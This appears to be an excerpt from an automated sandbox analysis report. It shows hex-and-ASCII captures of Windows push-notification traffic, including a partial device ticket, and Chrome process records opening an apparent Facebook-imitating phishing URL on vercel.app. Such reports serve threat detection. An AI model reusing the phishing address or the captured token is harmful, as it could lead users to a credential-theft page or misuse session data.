                          2025-01-14 23:43:05 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                          Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                          2025-01-14 23:43:05 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 61 34 4c 6a 30 52 31 32 54 45 43 41 57 4e 62 56 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 62 34 37 31 63 61 33 36 34 62 30 30 37 38 32 33 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 57 4f 70 37 59 56 35 33 6a 38 51 34 58 4b 45 37 69 76 69 58 79 69 62 51 7a 51 42 4d 73 4d 4b 50 76 51 34 35 50 30 37 30 77 72 57 47 73 51 6e 43 52 38 31 78 6e 4b 74 69 75 44 53 68 66 55 32 36 30 5a 31 64 76 62 57 57 74 77 4a 30 58 6c 62 59 51 51 4c 79 72 39 6d 41 34 41 34 44 51 78 51 42 2b 74 64 76 67 53 6a 68 4f 73 4d 74 70
                          Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: a4Lj0R12TECAWNbV.2Context: b471ca364b007823<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAWOp7YV53j8Q4XKE7iviXyibQzQBMsMKPvQ45P070wrWGsQnCR81xnKtiuDShfU260Z1dvbWWtwJ0XlbYQQLyr9mA4A4DQxQB+tdvgSjhOsMtp
                          2025-01-14 23:43:05 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 61 34 4c 6a 30 52 31 32 54 45 43 41 57 4e 62 56 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 62 34 37 31 63 61 33 36 34 62 30 30 37 38 32 33 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                          Data Ascii: BND 3 CON\WNS 0 197MS-CV: a4Lj0R12TECAWNbV.3Context: b471ca364b007823<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                          2025-01-14 23:43:05 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                          Data Ascii: 202 1 CON 58
                          2025-01-14 23:43:05 UTC58INData Raw: 4d 53 2d 43 56 3a 20 70 33 46 31 63 71 74 44 63 30 53 42 58 2f 47 65 48 58 36 4d 41 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                          Data Ascii: MS-CV: p3F1cqtDc0SBX/GeHX6MAA.0Payload parsing failed.


                          Session IDSource IPSource PortDestination IPDestination Port
                          17192.168.2.65001040.115.3.253443
                          TimestampBytes transferredDirectionData
                          2025-01-14 23:43:28 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 38 68 64 63 34 52 45 56 77 30 65 59 30 39 77 39 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 35 33 38 36 61 66 65 61 37 30 39 37 37 30 30 0d 0a 0d 0a
                          Data Ascii: CNT 1 CON 305MS-CV: 8hdc4REVw0eY09w9.1Context: 95386afea7097700
                          2025-01-14 23:43:28 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                          Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                          2025-01-14 23:43:28 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 38 68 64 63 34 52 45 56 77 30 65 59 30 39 77 39 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 35 33 38 36 61 66 65 61 37 30 39 37 37 30 30 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 57 4f 70 37 59 56 35 33 6a 38 51 34 58 4b 45 37 69 76 69 58 79 69 62 51 7a 51 42 4d 73 4d 4b 50 76 51 34 35 50 30 37 30 77 72 57 47 73 51 6e 43 52 38 31 78 6e 4b 74 69 75 44 53 68 66 55 32 36 30 5a 31 64 76 62 57 57 74 77 4a 30 58 6c 62 59 51 51 4c 79 72 39 6d 41 34 41 34 44 51 78 51 42 2b 74 64 76 67 53 6a 68 4f 73 4d 74 70
                          Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: 8hdc4REVw0eY09w9.2Context: 95386afea7097700<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAWOp7YV53j8Q4XKE7iviXyibQzQBMsMKPvQ45P070wrWGsQnCR81xnKtiuDShfU260Z1dvbWWtwJ0XlbYQQLyr9mA4A4DQxQB+tdvgSjhOsMtp
                          2025-01-14 23:43:28 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 38 68 64 63 34 52 45 56 77 30 65 59 30 39 77 39 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 35 33 38 36 61 66 65 61 37 30 39 37 37 30 30 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                          Data Ascii: BND 3 CON\WNS 0 197MS-CV: 8hdc4REVw0eY09w9.3Context: 95386afea7097700<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                          2025-01-14 23:43:28 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                          Data Ascii: 202 1 CON 58
                          2025-01-14 23:43:28 UTC58INData Raw: 4d 53 2d 43 56 3a 20 59 48 38 55 47 69 36 78 33 30 47 5a 6b 33 59 50 53 51 50 69 51 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                          Data Ascii: MS-CV: YH8UGi6x30GZk3YPSQPiQA.0Payload parsing failed.


                          Click to jump to process

                          Click to jump to process

                          Click to jump to process

                          Target ID:1
                          Start time:18:42:19
                          Start date:14/01/2025
                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                          Imagebase:0x7ff684c40000
                          File size:3'242'272 bytes
                          MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:false

                          Target ID:3
                          Start time:18:42:23
                          Start date:14/01/2025
                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2568 --field-trial-handle=2536,i,12870712407425050834,15902739686211572899,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                          Imagebase:0x7ff684c40000
                          File size:3'242'272 bytes
                          MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:false

                          Target ID:4
                          Start time:18:42:29
                          Start date:14/01/2025
                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.app/facebook.com.html"
                          Imagebase:0x7ff684c40000
                          File size:3'242'272 bytes
                          MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:true

                          No disassembly